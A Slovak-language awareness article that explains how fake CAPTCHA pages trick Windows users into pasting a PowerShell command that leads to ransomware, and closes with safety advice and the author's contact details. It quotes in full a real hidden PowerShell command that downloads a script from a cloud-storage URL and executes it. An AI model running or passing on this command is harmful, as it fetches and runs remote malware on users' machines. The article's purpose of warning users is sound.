Falošné CAPTCHA a ransomvér: Ako funguje útok?

/ Návody / Od

Falošná CAPTCHA ako nástroj ransomvérového útoku

V posledných mesiacoch sa rozšíril nový spôsob šírenia ransomvérových útokov, ktorý cieli na bežných používateľov Windows.
Útočníci zneužívajú falošnú verziu CAPTCHA overenia – známeho bezpečnostného prvku, ktorý bežne používame pri prihlasovaní alebo sťahovaní súborov.

Takýto škodlivý kód sa môže šíriť viacerými spôsobmi:

  • cez pirátske weby s nelegálnym softvérom alebo filmami,
  • cez podvodné emaily s prílohami alebo odkazmi,
  • cez falošné aktualizácie (napr. prehliadača alebo prehrávača videí),
  • cez falošné technické podpory, ktoré presviedčajú obeť, aby si stiahla „opravný nástroj“.

⚠️ Práve falošná CAPTCHA je v poslednom čase častým trikom, ako obeť donútiť, aby si sama spustila škodlivý skript.

1️⃣ Začína to falošnou stránkou

Používateľ si napríklad stiahne súbor download.htm a otvorí ho v prehliadači. Následne sa mu zobrazí stránka, ktorá vyzerá ako bežná CAPTCHA overovacia výzva.

Otvorenie download.htm súboru
Otvorenie download.htm súboru

 

Falošná CAPTCHA stránka
Falošná CAPTCHA stránka

2️⃣ Inštrukcie vedú k spusteniu škodlivého kódu

Namiesto zadania textu z obrázka dostane používateľ pokyn otvoriť klávesovou skratkou Win + R príkazové okno a vložiť pripravený skript.

Falošný návod na verifikáciu
Falošný návod na verifikáciu

Tento skript je napísaný v PowerShelli a vyzerá napríklad takto:

powershell.exe -W Hidden -command $url = 'https://zip-store.oss-ap-southeast-1.aliyuncs.com/v2-sep-baba.txt';
$response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text
Zobrazenie skriptu v notepade
Zobrazenie skriptu v notepade

3️⃣ Skript si stiahne a spustí škodlivý kód

Príkaz vyššie spôsobí, že PowerShell stiahne ďalší skript z internetu a okamžite ho spustí. Obsah tohto skriptu môže byť čokoľvek — najčastejšie však ide o ransomvér, ktorý zašifruje všetky súbory v počítači a žiada výkupné.

4️⃣ Adresa, z ktorej sa skript sťahuje

Škodlivý kód sa často nachádza na podozrivých doménach, ktoré napodobňujú známe služby – napríklad oss-ap-southeast-1.aliyuncs.com.

5️⃣ Čo si z toho odniesť?

  • Nikdy nevykonávajte príkazy, ktoré nájdete na neznámych stránkach.
  • ⚙️ PowerShell môže byť veľmi silný nástroj – no aj veľmi nebezpečný, ak ho zneužije útočník.
  • ❗ Skutočná CAPTCHA vás nikdy nevyzve k spusteniu príkazov vo vašom systéme!
  • ️ Majte aktualizovaný antivírusový softvér a zálohované dáta.

⚠️ Ak ste niečo podobné spustili, okamžite odpojte počítač od internetu a kontaktujte IT špecialistu.

6️⃣ Záver

Tento typ útoku využíva sociálne inžinierstvo – útočník sa nesnaží obísť systém, ale oklamať vás, aby ste mu sami otvorili dvere.
Buďte vždy obozretní a v prípade pochybností nič nespúšťajte.

V prípade potreby ma kontaktujte

Jaroslav Huba – počítačový špecialista
mobil: +421 903 500 083
email: hubajaro@gmail.com

http://sk.linkedin.com/in/hubajaro